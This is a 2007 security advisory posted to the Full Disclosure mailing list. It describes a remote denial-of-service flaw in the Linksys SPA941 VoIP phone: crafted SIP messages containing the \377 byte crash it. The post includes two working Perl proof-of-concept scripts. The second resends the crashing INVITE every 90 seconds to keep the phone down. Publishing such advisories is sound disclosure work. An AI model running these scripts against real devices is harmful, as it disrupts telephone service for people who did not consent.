Full Disclosure mailing list archives
Linksys SPA941 remote DOS with \377 character
From: "Radu State" <state () loria fr>
Date: Tue, 24 Apr 2007 14:34:27 +0200
MADYNES Security Advisory <http://madynes.loria.fr/> http://madynes.loria.fr Title: Linksys SPA941 remote DOS with \377 character Discovery Date: 01/02/2007 Vendor notification: 4/04/2007 and 17/04/2007 Release Date: 24/04/2007 Severity: Moderate - Denial of Service Advisory ID:KIHP3 Vulnerability in Linksys SPA941 Synopsis: After sending a crafted SIP messages the device immediately reboots. The phone does not check properly the metacharacters \377 in the SIP field. The vendor was informed and future firmware will be available. This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer. Background: SIP is the IETF standardized (RFCs 2543 and 3261) protocol for VoIP signalization. SIP is an ASCII based INVITE message is used to initiate and maintain a communication session. Configuration of our device: * Software Version:5.1.5 * IP-Address obtained by DHCP as 192.168.1.107 * User Name: linksys Vulnerability: It may reboot and/or replies with invalid messages. The phone is not able to handle well the character \377 (full byte) in a message. Depending where this character is located the phone may reboot (e.g. in any section of the FROM header). If this character is located anywhere else it may modify the content of the reply messages generated by the phone as showed in the exploit. It looks like a format string vulnerability, but no effort to investigate firmware was done. Exploit 1) In this exploit we set a \377 character before every carriage return. The Replies are modified in their Status line and most of the headers are erased. Different behavior exists depending in the quantity of \377 characters and their location. Linksys IP Phone SPA941 (firmware 5.1.5), can not cope with the \337 characters in the FROM field when the real (IP port in the IP packet) is different from the IP port in the SIP-FROM field . Exploit 1) To run the exploit the file linksys-5.1.5.pl should be launched (assuming our configurations) as: perl linksys-5.1.5.pl 192.168.1.107 5060 linksys POC: 1 #!/usr/bin/perl use IO::Socket::INET; die "Usage $0 <dst> <port> <username>" unless ($ARGV[2]); $socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], Proto=>'udp', PeerAddr=>$ARGV[0]); $msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r Max-Forwards: 70\377\r To: lynksys <sip:$ARGV[2]\@$ARGV[0]>\377\r From: <sip:tucuman\@192.168.1.2>;tag=00\377\r Call-ID: tucu\@192.168.1.2\377\r CSeq: 24865 INVITE\377\r Contact: <sip:tucu\@192.168.1.2>\377\r Supported: 100rel\377\r Content-Length: 0\377\r \r\n"; $socket->send($msg); Exploit 2) In order to remote reboot the phone the following PC will work If the phone is called with the POC 2 it will ring. When answering it reboots immediately. If not it will reboot after some time. The POC will send the killer message every 90 seconds -the time needed for a reboot and performs the effective DOS. It also opens a socket on the local machine to avoid sending RST to the phone. The same can be obtained with a firewall or a netcat. POC 2: Command: perl script.pl <username> <dst_IP> <SourceIp> <sourceport> Eg. Perl script.pl 101 152.81.114.195 152.81.12.93 5060 Script Code: #!/usr/bin/perl use IO::Socket; #die "Usage $0 <username> <dst_IP> <Source_IP> <SourcePort>" unless ($ARGV[2]); die "Usage $0 <username> <dst_IP> <SourceIp> <sourceport>" unless ($ARGV[0]); my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp'); $socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061'); $touser=$ARGV[0]; $target=$ARGV[1]; $sourceaddress=$ARGV[2]; $sourceport=$ARGV[3]; $high=2000; $low=1; $fromuserid = int(rand( $high-$low+1 ) ) + $low; my $cseq = "INVITE"; $msg = "INVITE sip:$touser\@$target SIP/2.0\r Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r From: \377<sip:$fromuserid\@$sourceaddress>;tag=779\r To: Receiver <sip:$touser\@$target>\r Call-ID: 10\@$sourceaddress\r CSeq: 1 $cseq\r Contact: 779 <sip:$fromuserid\@$sourceaddress>\r Expires: 1200\r Max-Forwards: 70\r Content-Type: application/sdp\r Content-Length: 133\r \r v=0\r o=0 0 0 IN IP4 $sourceaddress\r s=Session SDP\r c=IN IP4 $sourceaddress\r t=0 0\r m=audio 9876 RTP/AVP 0\r a=rtpmap:0 PCMU/8000\r"; $sock or die "no socket :$!"; while (1){ $socket->send($msg); sleep 90; } Impact: A malicious user can remotely crash and perform a denial of service attack by sending one crafted SIP messages. This is conceptually similar to the "ping of death". Resolution: Fixed software will be available and following recommended best practices (ie segregating VOIP traffic from data) will be protected from malicious traffic in most situations.
From Linksys response we include the following resolution: This style of
attack, limited to a single end point and executed from behind a secure firewall, should not affect an entire network and in most cases should easily be contained by the local network management entity. Linksys will directly address this issue with a future release of the phone firmware. Distribution: The advisory will be posted on the following websites: madynes.loria.fr The advisory will be posted to the following mailing lists Voipsec : voipsec () voipsa org. fulldisclosure: full-disclosure () lists grok org uk Credits: Balamurugan Karpagavinayagam (Software engineer) Humberto J. Abdelnur (Ph.D Student) Radu State (Ph.D) Olivier Festor (Ph.D) This vulnerability was identified by the Madynes research team at INRIA Lorraine, using the Madynes VoIP fuzzer. Information about us: Madynes is a research team at INRIA Lorraine working on VoIP Security assessment, intrusion detection and prevention.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Linksys SPA941 remote DOS with \377 character Radu State (Apr 24)